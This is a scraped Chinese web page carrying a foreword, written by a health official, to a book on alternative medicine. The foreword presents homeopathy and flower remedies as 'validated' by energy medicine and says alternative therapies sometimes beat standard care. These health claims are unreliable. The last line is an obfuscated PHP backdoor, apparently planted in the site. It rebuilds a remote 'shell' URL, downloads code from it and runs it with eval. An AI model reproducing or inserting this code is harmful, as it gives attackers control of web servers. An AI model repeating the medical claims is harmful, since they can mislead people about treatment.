收藏本站
推薦序 列印 E-mail
文章索引
推薦序
頁 2
頁 3
頁 4
頁 5
頁 6
頁 7
頁 8

另類醫學的總和

黃焜璋 行政院衛生署技監

劉醫師融合並精通各種國內外醫學專業於一身,可說是 醫界的一朵奇葩。

「另類醫學」在醫學上被歸類為「另類療法」或「輔 助性療法」,係在西醫正統療法有盲點或缺撼時,被用來 做為醫療輔助之用;但有時,它的功效甚至超過正統的方 法。六十年前,西德傅爾醫師發明傅爾電針,他將人體穴 位的能量加以量化,用來做為人體疾病治療及藥物選擇的 參考,奠定了現代能量醫學的基礎。在「能量醫學」的檢 測下,舉凡「花精療法」、「同類療法」等相傳數百年的 西方傳統醫學,再度獲得印證與發揚。

中華民國另類醫學醫學會理事長劉大元醫師,以一位 接受嚴格西醫訓練的醫師,因著「悲天憫人」的情懷,投 入另類醫學領域達二十年之久;同時,劉醫師又前往中國 醫學大學修學中醫,其融合並精通各種國內外醫學專業於 一身,可說是醫界的一朵奇葩。

劉醫師這本「你不可不知的另類健康法」談及各種主 流醫學結合另類醫學的醫療方式,可說是集其行醫二十餘 年的經驗總和,值此出版之時,特以此序為之道賀。



黃焜璋 簡介

‧台灣大學醫學院醫學系畢
‧美國約翰霍普金斯大學公共衛生碩士
‧署立台北醫院院長
‧台灣大學醫學院副教授
‧北區醫院區域聯盟主任委員



 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));